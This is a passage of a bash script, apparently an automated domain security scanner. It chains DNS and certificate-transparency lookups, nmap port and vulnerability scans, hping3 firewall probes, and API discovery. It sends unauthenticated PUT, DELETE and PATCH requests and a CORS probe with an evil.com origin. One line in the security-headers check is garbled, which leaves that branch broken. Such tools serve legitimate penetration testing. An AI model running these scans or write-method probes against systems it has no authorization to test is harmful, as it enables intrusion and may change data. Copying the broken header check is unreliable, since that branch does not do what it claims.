    if ifconfig "$NETWORK_INTERFACE" >/dev/null 2>&1; then
        log_success "Network interface $NETWORK_INTERFACE is available"
        local interface_ip=$(ifconfig "$NETWORK_INTERFACE" | grep 'inet ' | awk '{print $2}')
        log_debug "Interface IP: $interface_ip"
    else
        log_warning "Network interface $NETWORK_INTERFACE not found, using default routing"
        NETWORK_INTERFACE=""
    fi
    
    log_success "All required dependencies found"
}

################################################################################
# Initialize Scan
################################################################################
initialize_scan() {
    log_debug "Initializing scan for domain: $DOMAIN"
    SCAN_DATE=$(date +"%Y-%m-%d %H:%M:%S")
    SCAN_DIR="scan_${DOMAIN}_$(date +%Y%m%d_%H%M%S)"
    
    log_debug "Creating scan directory: $SCAN_DIR"
    mkdir -p "$SCAN_DIR"
    cd "$SCAN_DIR" || exit 1
    
    log_success "Created scan directory: $SCAN_DIR"
    log_debug "Current working directory: $(pwd)"
    
    # Initialize report files
    EXEC_REPORT="executive_summary.md"
    TECH_REPORT="technical_report.md"
    VULN_REPORT="vulnerability_report.md"
    API_REPORT="api_security_report.md"
    
    log_debug "Initializing report files"
    > "$EXEC_REPORT"
    > "$TECH_REPORT"
    > "$VULN_REPORT"
    > "$API_REPORT"
    
    log_debug "Scan configuration:"
    log_debug "  - Domain: $DOMAIN"
    log_debug "  - Subdomain scanning: $SCAN_SUBDOMAINS"
    log_debug "  - Max subdomains: $MAX_SUBDOMAINS"
    log_debug "  - Vulnerability scanning: $VULN_SCAN"
    log_debug "  - API scanning: $API_SCAN"
    log_debug "  - Network interface: $NETWORK_INTERFACE"
}

################################################################################
# DNS Reconnaissance
################################################################################
dns_reconnaissance() {
    log_info "Performing DNS reconnaissance..."
    log_debug "Resolving domain: $DOMAIN"
    
    # Resolve domain to IP
    IP_ADDRESS=$(dig +short "$DOMAIN" | grep -E '^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$' | head -n1)
    
    if [ -z "$IP_ADDRESS" ]; then
        log_error "Could not resolve domain: $DOMAIN"
        log_debug "DNS resolution failed for $DOMAIN"
        exit 1
    fi
    
    log_success "Resolved $DOMAIN to $IP_ADDRESS"
    log_debug "Target IP address: $IP_ADDRESS"
    
    # Get comprehensive DNS records
    log_debug "Querying DNS records (ANY)..."
    dig "$DOMAIN" ANY > dns_records.txt 2>&1
    log_debug "Querying A records..."
    dig "$DOMAIN" A > dns_a_records.txt 2>&1
    log_debug "Querying MX records..."
    dig "$DOMAIN" MX > dns_mx_records.txt 2>&1
    log_debug "Querying NS records..."
    dig "$DOMAIN" NS > dns_ns_records.txt 2>&1
    log_debug "Querying TXT records..."
    dig "$DOMAIN" TXT > dns_txt_records.txt 2>&1
    
    # Reverse DNS lookup
    log_debug "Performing reverse DNS lookup for $IP_ADDRESS..."
    dig -x "$IP_ADDRESS" > reverse_dns.txt 2>&1
    
    echo "$IP_ADDRESS" > ip_address.txt
    log_debug "DNS reconnaissance complete"
}

################################################################################
# Subdomain Discovery
################################################################################
discover_subdomains() {
    if [ "$SCAN_SUBDOMAINS" = false ]; then
        log_info "Subdomain scanning disabled"
        log_debug "Skipping subdomain discovery"
        echo "0" > subdomain_count.txt
        return
    fi
    
    log_info "Discovering subdomains via certificate transparency..."
    log_debug "Querying crt.sh for subdomains of $DOMAIN"
    log_debug "Maximum subdomains to discover: $MAX_SUBDOMAINS"
    
    # Query crt.sh for subdomains
    curl -s "https://crt.sh/?q=%25.${DOMAIN}&output=json" | \
        jq -r '.[].name_value' | \
        sed 's/\*\.//g' | \
        sort -u | \
        grep -E "^[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.${DOMAIN}$" | \
        head -n "$MAX_SUBDOMAINS" > subdomains_discovered.txt
    
    SUBDOMAIN_COUNT=$(wc -l < subdomains_discovered.txt)
    echo "$SUBDOMAIN_COUNT" > subdomain_count.txt
    
    log_success "Discovered $SUBDOMAIN_COUNT subdomains (limited to $MAX_SUBDOMAINS)"
    log_debug "Subdomains saved to: subdomains_discovered.txt"
}

################################################################################
# SSL/TLS Analysis
################################################################################
ssl_tls_analysis() {
    log_info "Analyzing SSL/TLS configuration..."
    log_debug "Connecting to ${DOMAIN}:443 for certificate analysis"
    
    # Get certificate details
    log_debug "Extracting certificate details..."
    echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -text > certificate_details.txt 2>&1
    
    # Extract key information
    log_debug "Extracting certificate issuer..."
    CERT_ISSUER=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -issuer | sed 's/issuer=//')
    
    log_debug "Extracting certificate subject..."
    CERT_SUBJECT=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -subject | sed 's/subject=//')
    
    log_debug "Extracting certificate dates..."
    CERT_DATES=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
        openssl x509 -noout -dates)
    
    echo "$CERT_ISSUER" > cert_issuer.txt
    echo "$CERT_SUBJECT" > cert_subject.txt
    echo "$CERT_DATES" > cert_dates.txt
    
    log_debug "Certificate issuer: $CERT_ISSUER"
    log_debug "Certificate subject: $CERT_SUBJECT"
    
    # Enumerate SSL/TLS ciphers
    log_info "Enumerating SSL/TLS ciphers..."
    log_debug "Running nmap ssl-enum-ciphers script on port 443"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script ssl-enum-ciphers -p 443 "$DOMAIN" -e "$NETWORK_INTERFACE" -oN ssl_ciphers.txt > /dev/null 2>&1
    else
        nmap --script ssl-enum-ciphers -p 443 "$DOMAIN" -oN ssl_ciphers.txt > /dev/null 2>&1
    fi
    
    # Check for TLS versions
    log_debug "Analyzing TLS protocol versions..."
    TLS_12=$(grep -c "TLSv1.2" ssl_ciphers.txt || echo "0")
    TLS_13=$(grep -c "TLSv1.3" ssl_ciphers.txt || echo "0")
    TLS_10=$(grep -c "TLSv1.0" ssl_ciphers.txt || echo "0")
    TLS_11=$(grep -c "TLSv1.1" ssl_ciphers.txt || echo "0")
    
    echo "TLSv1.0: $TLS_10" > tls_versions.txt
    echo "TLSv1.1: $TLS_11" >> tls_versions.txt
    echo "TLSv1.2: $TLS_12" >> tls_versions.txt
    echo "TLSv1.3: $TLS_13" >> tls_versions.txt
    
    log_debug "TLS versions found - 1.0:$TLS_10 1.1:$TLS_11 1.2:$TLS_12 1.3:$TLS_13"
    
    # Check for SSL vulnerabilities
    log_info "Checking for SSL/TLS vulnerabilities..."
    log_debug "Running SSL vulnerability scripts (heartbleed, poodle, dh-params)"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script ssl-heartbleed,ssl-poodle,ssl-dh-params -p 443 "$DOMAIN" -e "$NETWORK_INTERFACE" -oN ssl_vulnerabilities.txt > /dev/null 2>&1
    else
        nmap --script ssl-heartbleed,ssl-poodle,ssl-dh-params -p 443 "$DOMAIN" -oN ssl_vulnerabilities.txt > /dev/null 2>&1
    fi
    
    log_success "SSL/TLS analysis complete"
}

################################################################################
# Port Scanning with Service Detection
################################################################################
port_scanning() {
    log_info "Performing comprehensive port scan..."
    log_debug "Target IP: $IP_ADDRESS"
    log_debug "Using network interface: $NETWORK_INTERFACE"
    
    # Quick scan of top 1000 ports
    log_info "Scanning top 1000 ports..."
    log_debug "Running nmap with service version detection (-sV) and default scripts (-sC)"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap -sV -sC --top-ports 1000 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN port_scan_top1000.txt > /dev/null 2>&1
    else
        nmap -sV -sC --top-ports 1000 "$IP_ADDRESS" -oN port_scan_top1000.txt > /dev/null 2>&1
    fi
    
    # Count open ports
    OPEN_PORTS=$(grep -c "^[0-9]*/tcp.*open" port_scan_top1000.txt || echo "0")
    echo "$OPEN_PORTS" > open_ports_count.txt
    log_debug "Found $OPEN_PORTS open ports"
    
    # Extract open ports list with versions
    log_debug "Extracting open ports list with service information"
    grep "^[0-9]*/tcp.*open" port_scan_top1000.txt | awk '{print $1, $3, $4, $5, $6}' > open_ports_list.txt
    
    # Detect service versions for old software
    log_info "Detecting service versions..."
    log_debug "Filtering service version information"
    grep "^[0-9]*/tcp.*open" port_scan_top1000.txt | grep -E "version|product" > service_versions.txt
    
    log_success "Port scan complete: $OPEN_PORTS open ports found"
}

################################################################################
# Vulnerability Scanning
################################################################################
vulnerability_scanning() {
    if [ "$VULN_SCAN" = false ]; then
        log_info "Vulnerability scanning disabled"
        log_debug "Skipping vulnerability scanning"
        return
    fi
    
    log_info "Performing vulnerability scanning (this may take 10-20 minutes)..."
    log_debug "Target: $IP_ADDRESS"
    log_debug "Using network interface: $NETWORK_INTERFACE"
    
    # NMAP vulnerability scripts
    log_info "Running NMAP vulnerability scripts..."
    log_debug "Starting comprehensive vulnerability scan on all ports (-p-)"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script vuln -p- "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN nmap_vuln_scan.txt > /dev/null 2>&1 &
    else
        nmap --script vuln -p- "$IP_ADDRESS" -oN nmap_vuln_scan.txt > /dev/null 2>&1 &
    fi
    VULN_PID=$!
    log_debug "Vulnerability scan PID: $VULN_PID"
    
    # Wait with progress indicator
    log_debug "Waiting for vulnerability scan to complete..."
    while kill -0 $VULN_PID 2>/dev/null; do
        echo -n "."
        sleep 5
    done
    echo
    
    # Parse vulnerability results
    if [ -f nmap_vuln_scan.txt ]; then
        log_debug "Parsing vulnerability scan results"
        grep -i "VULNERABLE" nmap_vuln_scan.txt > vulnerabilities_found.txt || echo "No vulnerabilities found" > vulnerabilities_found.txt
        VULN_COUNT=$(grep -c "VULNERABLE" nmap_vuln_scan.txt || echo "0")
        echo "$VULN_COUNT" > vulnerability_count.txt
        log_success "Vulnerability scan complete: $VULN_COUNT vulnerabilities found"
        log_debug "Vulnerability details saved to: vulnerabilities_found.txt"
    fi
    
    # Check for specific vulnerabilities
    log_info "Checking for common HTTP vulnerabilities..."
    log_debug "Running HTTP vulnerability scripts on ports 80,443,8080,8443"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap --script http-vuln-* -p 80,443,8080,8443 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN http_vulnerabilities.txt > /dev/null 2>&1
    else
        nmap --script http-vuln-* -p 80,443,8080,8443 "$IP_ADDRESS" -oN http_vulnerabilities.txt > /dev/null 2>&1
    fi
    log_debug "HTTP vulnerability scan complete"
}

################################################################################
# hping3 Testing
################################################################################
hping3_testing() {
    if ! command -v hping3 >/dev/null 2>&1; then
        log_warning "hping3 not installed, skipping firewall tests"
        log_debug "hping3 command not found in PATH"
        return
    fi
    
    log_info "Performing hping3 firewall tests..."
    log_debug "Target: $IP_ADDRESS"
    log_debug "Using network interface: $NETWORK_INTERFACE"
    
    # TCP SYN scan
    log_info "Testing TCP SYN response..."
    log_debug "Sending 5 TCP SYN packets to port 80"
    if [ -n "$NETWORK_INTERFACE" ]; then
        timeout 10 hping3 -S -p 80 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_syn.txt 2>&1 || true
    else
        timeout 10 hping3 -S -p 80 -c 5 "$IP_ADDRESS" > hping3_syn.txt 2>&1 || true
    fi
    log_debug "TCP SYN test complete"
    
    # TCP ACK scan (firewall detection)
    log_info "Testing firewall with TCP ACK..."
    log_debug "Sending 5 TCP ACK packets to port 80 for firewall detection"
    if [ -n "$NETWORK_INTERFACE" ]; then
        timeout 10 hping3 -A -p 80 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_ack.txt 2>&1 || true
    else
        timeout 10 hping3 -A -p 80 -c 5 "$IP_ADDRESS" > hping3_ack.txt 2>&1 || true
    fi
    log_debug "TCP ACK test complete"
    
    # ICMP test
    log_info "Testing ICMP response..."
    log_debug "Sending 5 ICMP echo requests"
    if [ -n "$NETWORK_INTERFACE" ]; then
        timeout 10 hping3 -1 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_icmp.txt 2>&1 || true
    else
        timeout 10 hping3 -1 -c 5 "$IP_ADDRESS" > hping3_icmp.txt 2>&1 || true
    fi
    log_debug "ICMP test complete"
    
    log_success "hping3 tests complete"
}

################################################################################
# Asset Discovery
################################################################################
asset_discovery() {
    log_info "Performing detailed asset discovery..."
    log_debug "Creating assets directory"
    
    mkdir -p assets
    
    # Web technology detection
    log_info "Detecting web technologies..."
    log_debug "Fetching HTTP headers from https://${DOMAIN}"
    curl -s -I "https://${DOMAIN}" | grep -i "server\|x-powered-by\|x-aspnet-version" > assets/web_technologies.txt
    log_debug "Web technologies saved to: assets/web_technologies.txt"
    
    # Detect CMS
    log_info "Detecting CMS and frameworks..."
    log_debug "Analyzing page content for CMS signatures"
    curl -s "https://${DOMAIN}" | grep -iE "wordpress|joomla|drupal|magento|shopify" > assets/cms_detection.txt || echo "No CMS detected" > assets/cms_detection.txt
    log_debug "CMS detection complete"
    
    # JavaScript libraries
    log_info "Detecting JavaScript libraries..."
    log_debug "Searching for common JavaScript libraries"
    curl -s "https://${DOMAIN}" | grep -oE "jquery|angular|react|vue|bootstrap" | sort -u > assets/js_libraries.txt || echo "None detected" > assets/js_libraries.txt
    log_debug "JavaScript libraries saved to: assets/js_libraries.txt"
    
    # Check for common files
    log_info "Checking for common files..."
    log_debug "Testing for robots.txt, sitemap.xml, security.txt, etc."
    for file in robots.txt sitemap.xml security.txt .well-known/security.txt humans.txt; do
        log_debug "Checking for: $file"
        if curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}/${file}" | grep -q "200"; then
            echo "$file: Found" >> assets/common_files.txt
            log_debug "Found: $file"
            curl -s "https://${DOMAIN}/${file}" > "assets/${file//\//_}"
        fi
    done
    
    # Server fingerprinting
    log_info "Fingerprinting server..."
    log_debug "Running nmap HTTP server header and title scripts"
    if [ -n "$NETWORK_INTERFACE" ]; then
        nmap -sV --script http-server-header,http-title -p 80,443 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN assets/server_fingerprint.txt > /dev/null 2>&1
    else
        nmap -sV --script http-server-header,http-title -p 80,443 "$IP_ADDRESS" -oN assets/server_fingerprint.txt > /dev/null 2>&1
    fi
    
    log_success "Asset discovery complete"
}

################################################################################
# Old Software Detection
################################################################################
detect_old_software() {
    log_info "Detecting outdated software versions..."
    log_debug "Creating old_software directory"
    
    mkdir -p old_software
    
    # Parse service versions from port scan
    if [ -f service_versions.txt ]; then
        log_debug "Analyzing service versions for outdated software"
        
        # Check for old Apache versions
        log_debug "Checking for old Apache versions..."
        grep -i "apache" service_versions.txt | grep -E "1\.|2\.0|2\.2" > old_software/apache_old.txt || true
        
        # Check for old OpenSSH versions
        log_debug "Checking for old OpenSSH versions..."
        grep -i "openssh" service_versions.txt | grep -E "[1-6]\." > old_software/openssh_old.txt || true
        
        # Check for old PHP versions
        log_debug "Checking for old PHP versions..."
        grep -i "php" service_versions.txt | grep -E "[1-5]\." > old_software/php_old.txt || true
        
        # Check for old MySQL versions
        log_debug "Checking for old MySQL versions..."
        grep -i "mysql" service_versions.txt | grep -E "[1-4]\." > old_software/mysql_old.txt || true
        
        # Check for old nginx versions
        log_debug "Checking for old nginx versions..."
        grep -i "nginx" service_versions.txt | grep -E "0\.|1\.0|1\.1[0-5]" > old_software/nginx_old.txt || true
    fi
    
    # Check SSL/TLS for old versions
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        log_debug "Outdated TLS protocols detected"
        echo "Outdated TLS protocols detected: TLSv1.0 or TLSv1.1" > old_software/tls_old.txt
    fi
    
    # Count old software findings
    OLD_SOFTWARE_COUNT=$(find old_software -type f ! -empty | wc -l)
    echo "$OLD_SOFTWARE_COUNT" > old_software_count.txt
    
    if [ "$OLD_SOFTWARE_COUNT" -gt 0 ]; then
        log_warning "Found $OLD_SOFTWARE_COUNT outdated software components"
        log_debug "Outdated software details saved in old_software/ directory"
    else
        log_success "No obviously outdated software detected"
    fi
}

################################################################################
# API Discovery
################################################################################
api_discovery() {
    if [ "$API_SCAN" = false ]; then
        log_info "API scanning disabled"
        log_debug "Skipping API discovery"
        return
    fi
    
    log_info "Discovering APIs..."
    log_debug "Creating api_discovery directory"
    
    mkdir -p api_discovery
    
    # Common API paths
    API_PATHS=(
        "/api"
        "/api/v1"
        "/api/v2"
        "/rest"
        "/graphql"
        "/swagger"
        "/swagger.json"
        "/api-docs"
        "/openapi.json"
        "/.well-known/openapi"
    )
    
    log_debug "Testing ${#API_PATHS[@]} common API endpoints"
    for path in "${API_PATHS[@]}"; do
        log_debug "Testing: $path"
        HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}${path}")
        if [ "$HTTP_CODE" != "404" ]; then
            echo "$path: HTTP $HTTP_CODE" >> api_discovery/endpoints_found.txt
            log_debug "Found API endpoint: $path (HTTP $HTTP_CODE)"
            curl -s "https://${DOMAIN}${path}" > "api_discovery/${path//\//_}.txt" 2>/dev/null || true
        fi
    done
    
    # Check for API documentation
    log_info "Checking for API documentation..."
    log_debug "Testing for Swagger UI and API docs"
    curl -s "https://${DOMAIN}/swagger-ui" > api_discovery/swagger_ui.txt 2>/dev/null || true
    curl -s "https://${DOMAIN}/api/docs" > api_discovery/api_docs.txt 2>/dev/null || true
    
    log_success "API discovery complete"
}

################################################################################
# API Permission Testing
################################################################################
api_permission_testing() {
    if [ "$API_SCAN" = false ]; then
        log_debug "API scanning disabled, skipping permission testing"
        return
    fi
    
    log_info "Testing API permissions..."
    log_debug "Creating api_permissions directory"
    
    mkdir -p api_permissions
    
    # Test common API endpoints without authentication
    if [ -f api_discovery/endpoints_found.txt ]; then
        log_debug "Testing discovered API endpoints for authentication issues"
        while IFS= read -r endpoint; do
            API_PATH=$(echo "$endpoint" | cut -d: -f1)
            
            # Test GET without auth
            log_info "Testing $API_PATH without authentication..."
            log_debug "Sending unauthenticated GET request to $API_PATH"
            HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}${API_PATH}")
            echo "$API_PATH: $HTTP_CODE" >> api_permissions/unauth_access.txt
            log_debug "Response: HTTP $HTTP_CODE"
            
            # Test common HTTP methods
            log_debug "Testing HTTP methods on $API_PATH"
            for method in GET POST PUT DELETE PATCH; do
                HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" -X "$method" "https://${DOMAIN}${API_PATH}")
                if [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "201" ]; then
                    log_warning "$API_PATH allows $method without authentication (HTTP $HTTP_CODE)"
                    echo "$API_PATH: $method - HTTP $HTTP_CODE" >> api_permissions/method_issues.txt
                fi
            done
        done < api_discovery/endpoints_found.txt
    fi
    
    # Check for CORS misconfigurations
    log_info "Checking CORS configuration..."
    log_debug "Testing CORS headers with evil.com origin"
    curl -s -H "Origin: https://evil.com" -I "https://${DOMAIN}/api" | grep -i "access-control" > api_permissions/cors_headers.txt || true
    
    log_success "API permission testing complete"
}

################################################################################
# HTTP Security Headers
################################################################################
http_security_headers() {
    log_info "Analyzing HTTP security headers..."
    log_debug "Fetching headers from https://${DOMAIN}"
    
    # Get headers from main domain
    curl -I "https://${DOMAIN}" 2>/dev/null > http_headers.txt
    
    # Check for specific security headers
    declare -A HEADERS=(
        ["x-frame-options"]="X-Frame-Options"
        ["x-content-type-options"]="X-Content-Type-Options"
        ["strict-transport-security"]="Strict-Transport-Security"
        ["content-security-policy"]="Content-Security-Policy"
        ["referrer-policy"]="Referrer-Policy"
        ["permissions-policy"]="Permissions-Policy"
        ["x-xss-protection"]="X-XSS-Protection"
    )
    
    log_debug "Checking for security headers"
    > security_headers_status.txt
    for header in "${!HEADERS[@]}"; do
        if grep -qi "^${header}:" http_headers.txt; then
 security_headers_status.txt
        else
            echo "${HEADERS[$header]}: Missing" >> security_headers_status.txt
        fi
    done
    
    log_success "HTTP security headers analysis complete"
}

################################################################################
# Subdomain Scanning
################################################################################
scan_subdomains() {
    if [ "$SCAN_SUBDOMAINS" = false ] || [ ! -f subdomains_discovered.txt ]; then
        log_debug "Subdomain scanning disabled or no subdomains discovered"
        return
    fi
    
    log_info "Scanning discovered subdomains..."
    log_debug "Creating subdomain_scans directory"
    
    mkdir -p subdomain_scans
    
    local count=0
    while IFS= read -r subdomain; do
        count=$((count + 1))
        log_info "Scanning subdomain $count/$SUBDOMAIN_COUNT: $subdomain"
        log_debug "Testing accessibility of $subdomain"
        
        # Quick check if subdomain is accessible
        HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${subdomain}" --max-time 5)
        
        if echo "$HTTP_CODE" | grep -q "^[2-4]"; then
            log_debug "$subdomain is accessible (HTTP $HTTP_CODE)"
            
            # Get headers
            log_debug "Fetching headers from $subdomain"
            curl -I "https://${subdomain}" 2>/dev/null > "subdomain_scans/${subdomain}_headers.txt"
            
            # Quick port check (top 100 ports)
            log_debug "Scanning top 100 ports on $subdomain"
            if [ -n "$NETWORK_INTERFACE" ]; then
                nmap --top-ports 100 "$subdomain" -e "$NETWORK_INTERFACE" -oN "subdomain_scans/${subdomain}_ports.txt" > /dev/null 2>&1
            else
                nmap --top-ports 100 "$subdomain" -oN "subdomain_scans/${subdomain}_ports.txt" > /dev/null 2>&1
            fi
            
            # Check for old software
            log_debug "Checking service versions on $subdomain"
            if [ -n "$NETWORK_INTERFACE" ]; then
                nmap -sV --top-ports 10 "$subdomain" -e "$NETWORK_INTERFACE" -oN "subdomain_scans/${subdomain}_versions.txt" > /dev/null 2>&1
            else
                nmap -sV --top-ports 10 "$subdomain" -oN "subdomain_scans/${subdomain}_versions.txt" > /dev/null 2>&1
            fi
            
            log_success "Scanned: $subdomain (HTTP $HTTP_CODE)"
        else
            log_warning "Subdomain not accessible: $subdomain (HTTP $HTTP_CODE)"
        fi
    done < subdomains_discovered.txt
    
    log_success "Subdomain scanning complete"
}

################################################################################
# Generate Executive Summary
################################################################################
generate_executive_summary() {
    log_info "Generating executive summary..."
    log_debug "Creating executive summary report"
    
    cat > "$EXEC_REPORT" << EOF
# Executive Summary
## Enhanced Security Assessment Report

**Target Domain:** $DOMAIN  
**Target IP:** $IP_ADDRESS  
**Scan Date:** $SCAN_DATE  
**Scanner Version:** $VERSION  
**Network Interface:** $NETWORK_INTERFACE

---

## Overview

This report summarizes the comprehensive security assessment findings for $DOMAIN. The assessment included passive reconnaissance, vulnerability scanning, asset discovery, and API security testing.

---

## Key Findings

### 1. Domain Information

- **Primary Domain:** $DOMAIN
- **IP Address:** $IP_ADDRESS
- **Subdomains Discovered:** $(cat subdomain_count.txt)

### 2. SSL/TLS Configuration

**Certificate Information:**
\`\`\`
Issuer: $(cat cert_issuer.txt)
Subject: $(cat cert_subject.txt)
$(cat cert_dates.txt)
\`\`\`

**TLS Protocol Support:**
\`\`\`
$(cat tls_versions.txt)
\`\`\`

**Assessment:**
EOF

    # Add TLS assessment
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        echo "⚠️ **Warning:** Outdated TLS protocols detected (TLSv1.0/1.1)" >> "$EXEC_REPORT"
    else
        echo "✅ **Good:** Only modern TLS protocols detected (TLSv1.2/1.3)" >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 3. Port Exposure

- **Open Ports (Top 1000):** $(cat open_ports_count.txt)

**Open Ports List:**
\`\`\`
$(cat open_ports_list.txt)
\`\`\`

### 4. Vulnerability Assessment

EOF

    if [ "$VULN_SCAN" = true ] && [ -f vulnerability_count.txt ]; then
        cat >> "$EXEC_REPORT" << EOF
- **Vulnerabilities Found:** $(cat vulnerability_count.txt)

**Critical Vulnerabilities:**
\`\`\`
$(head -20 vulnerabilities_found.txt)
\`\`\`

EOF
    else
        echo "Vulnerability scanning was not performed." >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 5. Outdated Software

- **Outdated Components Found:** $(cat old_software_count.txt)

EOF

    if [ -d old_software ] && [ "$(ls -A old_software)" ]; then
        echo "**Outdated Software Detected:**" >> "$EXEC_REPORT"
        echo "\`\`\`" >> "$EXEC_REPORT"
        find old_software -type f ! -empty -exec basename {} \; >> "$EXEC_REPORT"
        echo "\`\`\`" >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 6. API Security

EOF

    if [ "$API_SCAN" = true ]; then
        if [ -f api_discovery/endpoints_found.txt ]; then
            cat >> "$EXEC_REPORT" << EOF
**API Endpoints Discovered:**
\`\`\`
$(cat api_discovery/endpoints_found.txt)
\`\`\`

EOF
        fi
        
        if [ -f api_permissions/method_issues.txt ]; then
            cat >> "$EXEC_REPORT" << EOF
**API Permission Issues:**
\`\`\`
$(cat api_permissions/method_issues.txt)
\`\`\`

EOF
        fi
    else
        echo "API scanning was not performed." >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### 7. HTTP Security Headers

\`\`\`
$(cat security_headers_status.txt)
\`\`\`

---

## Priority Recommendations

### Immediate Actions (Priority 1)

EOF

    # Add specific recommendations
    if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
        echo "1. **Disable TLSv1.0/1.1:** Update TLS configuration immediately" >> "$EXEC_REPORT"
    fi
    
    if [ -f vulnerability_count.txt ] && [ "$(cat vulnerability_count.txt)" -gt 0 ]; then
        echo "2. **Patch Vulnerabilities:** Address $(cat vulnerability_count.txt) identified vulnerabilities" >> "$EXEC_REPORT"
    fi
    
    if [ -f old_software_count.txt ] && [ "$(cat old_software_count.txt)" -gt 0 ]; then
        echo "3. **Update Software:** Upgrade $(cat old_software_count.txt) outdated components" >> "$EXEC_REPORT"
    fi
    
    if grep -q "Missing" security_headers_status.txt; then
        echo "4. **Implement Security Headers:** Add missing HTTP security headers" >> "$EXEC_REPORT"
    fi
    
    if [ -f api_permissions/method_issues.txt ]; then
        echo "5. **Fix API Permissions:** Implement proper authentication on exposed APIs" >> "$EXEC_REPORT"
    fi
    
    cat >> "$EXEC_REPORT" << EOF

### Review Actions (Priority 2)

1. Review all open ports and close unnecessary services
2. Audit subdomain inventory and decommission unused subdomains
3. Implement API authentication and authorization
4. Regular vulnerability scanning schedule
5. Software update policy and procedures

---

## Next Steps

1. Review detailed technical and vulnerability reports
2. Prioritize remediation based on risk assessment
3. Implement security improvements
4. Schedule follow-up assessment after remediation

---

**Report Generated:** $(date)  
**Scan Directory:** $SCAN_DIR

**Additional Reports:**
- Technical Report: technical_report.md
- Vulnerability Report: vulnerability_report.md
- API Security Report: api_security_report.md

EOF

    log_success "Executive summary generated: $EXEC_REPORT"
    log_debug "Executive summary saved to: $SCAN_DIR/$EXEC_REPORT"
}

################################################################################
# Generate Technical Report
################################################################################
generate_technical_report() {
    log_info "Generating detailed technical report..."
    log_debug "Creating technical report"
    
    cat > "$TECH_REPORT" << EOF
# Technical Security Assessment Report
## Target: $DOMAIN

**Assessment Date:** $SCAN_DATE  
**Target IP:** $IP_ADDRESS  
**Scanner Version:** $VERSION  
**Network Interface:** $NETWORK_INTERFACE  
**Classification:** CONFIDENTIAL

---

## 1. Scope

**Primary Target:** $DOMAIN  
**IP Address:** $IP_ADDRESS  
**Subdomain Scanning:** $([ "$SCAN_SUBDOMAINS" = true ] && echo "Enabled" || echo "Disabled")  
**Vulnerability Scanning:** $([ "$VULN_SCAN" = true ] && echo "Enabled" || echo "Disabled")  
**API Testing:** $([ "$API_SCAN" = true ] && echo "Enabled" || echo "Disabled")

---

## 2. DNS Configuration

\`\`\`
$(cat dns_records.txt)
\`\`\`

---

## 3. SSL/TLS Configuration

\`\`\`
$(cat certificate_details.txt)
\`\`\`

---

## 4. Port Scan Results

\`\`\`
$(cat port_scan_top1000.txt)
\`\`\`

---

## 5. Vulnerability Assessment

EOF

    if [ "$VULN_SCAN" = true ]; then
        cat >> "$TECH_REPORT" << EOF
### 5.1 NMAP Vulnerability Scan

\`\`\`
$(cat nmap_vuln_scan.txt)
\`\`\`

### 5.2 HTTP Vulnerabilities

\`\`\`
$(cat http_vulnerabilities.txt)
\`\`\`

### 5.3 SSL/TLS Vulnerabilities

\`\`\`
$(cat ssl_vulnerabilities.txt)
\`\`\`

EOF
    fi
    
    cat >> "$TECH_REPORT" << EOF

---

## 6. Asset Discovery

### 6.1 Web Technologies

\`\`\`
$(cat assets/web_technologies.txt)
\`\`\`

### 6.2 CMS Detection

\`\`\`
$(cat assets/cms_detection.txt)
\`\`\`

### 6.3 JavaScript Libraries

\`\`\`
$(cat assets/js_libraries.txt)
\`\`\`

### 6.4 Common Files

\`\`\`
$(cat assets/common_files.txt 2>/dev/null || echo "No common files found")
\`\`\`

---

## 7. Outdated Software

EOF

    if [ -d old_software ] && [ "$(ls -A old_software)" ]; then
        for file in old_software/*.txt; do
            if [ -f "$file" ] && [ -s "$file" ]; then
                echo "### $(basename "$file" .txt)" >> "$TECH_REPORT"
                echo "\`\`\`" >> "$TECH_REPORT"
                cat "$file" >> "$TECH_REPORT"
                echo "\`\`\`" >> "$TECH_REPORT"
                echo >> "$TECH_REPORT"
            fi
        done
    else
        echo "No outdated software detected." >> "$TECH_REPORT"
    fi
    
    cat >> "$TECH_REPORT" << EOF

---

## 8. API Security

EOF

    if [ "$API_SCAN" = true ]; then
        cat >> "$TECH_REPORT" << EOF
### 8.1 API Endpoints

\`\`\`
$(cat api_discovery/endpoints_found.txt 2>/dev/null || echo "No API endpoints found")
\`\`\`

### 8.2 API Permissions

\`\`\`
$(cat api_permissions/unauth_access.txt 2>/dev/null || echo "No permission issues found")
\`\`\`

### 8.3 CORS Configuration

\`\`\`
